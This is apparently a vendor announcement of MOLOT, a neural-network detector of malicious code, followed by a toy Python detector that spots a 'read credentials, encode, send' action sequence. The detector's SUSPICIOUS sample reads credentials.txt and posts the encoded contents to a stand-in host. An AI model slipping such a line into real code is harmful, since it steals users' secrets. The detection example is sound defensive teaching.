Positive Technologies has developed MOLOT, a neural network for detecting malicious code in programs written in the world's most popular languages: Python, JavaScript, and TypeScript. Like large language models, MOLOT is built on the transformer architecture. The neural network has been running in PT Application Inspector, a code analyzer that searches for vulnerabilities and weaknesses in code, since release 6.0.
Unlike classic analysis tools, which search for individual dangerous code fragments using predefined rules, MOLOT views a program as a sequence of actions and evaluates whether they add up to a suspicious scenario. This makes it possible to detect malicious code 15% more accurately than classic rules and makes PT Application Inspector the second SAST (static application security testing) product in the world capable of detecting such threats by program behavior.

Most code analysis tools look for vulnerabilities, that is, errors and configuration weaknesses through which a project can be attacked from the outside. But recent incidents, including the LiteLLM case, show that the intentional insertion of malicious code into a project's own codebase often goes unnoticed during security checks. Such code does not exploit vulnerabilities; it runs with the same privileges as a regular application, so traditional tools do not notice it. This class of threats is described in CWE-506.
The challenge is that individual actions of malicious code look harmless: reading a file, sending a network request, decrypting a string, or launching a process. All of this also appears in ordinary applications. Code becomes dangerous when these actions are arranged in a specific sequence, for example, when a script reads a login and password, encodes them, and sends them to a third-party server. Classic rules that check individual constructs miss such scenarios.

MOLOT is designed differently. It extracts from the codebase all actions that the program performs when it runs: network access, file access, process launches, use of cryptography, and so on. These actions are collected into a sequence and fed into the neural network. Just as large language models learn to understand texts from sequences of words, MOLOT learns to understand programs from sequences of their actions and to distinguish scenarios typical of malicious code from ordinary ones.
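To make the behavioral idea in the two paragraphs above concrete, here is an added example (written for this page, not MOLOT's or Positive Technologies' code): a toy Python action-sequence extractor that maps the calls in a script's AST to abstract actions and checks whether the ordered "read credentials, encode, send" scenario described above is embedded in them. The action taxonomy, the scenario pattern and the two sample scripts are constructed assumptions; the product's real taxonomy and model are not shown.

```python
import ast

# Assumed, illustrative taxonomy: call name -> abstract action (not MOLOT's real one).
ACTIONS = {"open": "file_access", "read": "file_access", "b64encode": "encode",
           "post": "network_send", "urlopen": "network_send", "Popen": "process_launch"}

# Assumed scenario: the ordered steps the page describes as suspicious.
SCENARIOS = {"credential exfiltration": ["file_access", "encode", "network_send"]}

def call_name(node):
    """Bare name of the called function or method, e.g. 'post' for requests.post()."""
    func = node.func
    if isinstance(func, ast.Attribute):
        return func.attr
    return func.id if isinstance(func, ast.Name) else None

class ActionCollector(ast.NodeVisitor):
    """Record actions in execution order: a call's arguments run before the call."""
    def __init__(self):
        self.actions = []

    def visit_Call(self, node):
        self.generic_visit(node)  # nested calls in the arguments are recorded first
        action = ACTIONS.get(call_name(node))
        if action:
            self.actions.append(action)

def extract_actions(source):
    """Parse Python source and return its abstract action sequence."""
    collector = ActionCollector()
    collector.visit(ast.parse(source))
    return collector.actions

def is_subsequence(pattern, sequence):
    """True if every step of pattern occurs in sequence, in order (gaps allowed)."""
    it = iter(sequence)  # 'step in it' advances the iterator past each match
    return all(step in it for step in pattern)

def detect_scenarios(source):
    """Names of scenarios whose step order is embedded in the program's actions."""
    actions = extract_actions(source)
    return [name for name, steps in SCENARIOS.items() if is_subsequence(steps, actions)]

# Constructed samples: the same individually harmless actions, differently arranged.
BENIGN = 'with open("settings.json") as f:\n    data = f.read()\nprint(data)\n'
SUSPICIOUS = ('import base64, requests\n'
              'with open("credentials.txt") as f:\n    creds = f.read()\n'
              'requests.post("http://example.invalid/collect",'
              ' data=base64.b64encode(creds.encode()))\n')
```

The benign sample yields only file accesses, while the second yields file access, encode and network send in that order and matches the scenario, although a rule that flagged any one of those calls on its own would also fire on ordinary code.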

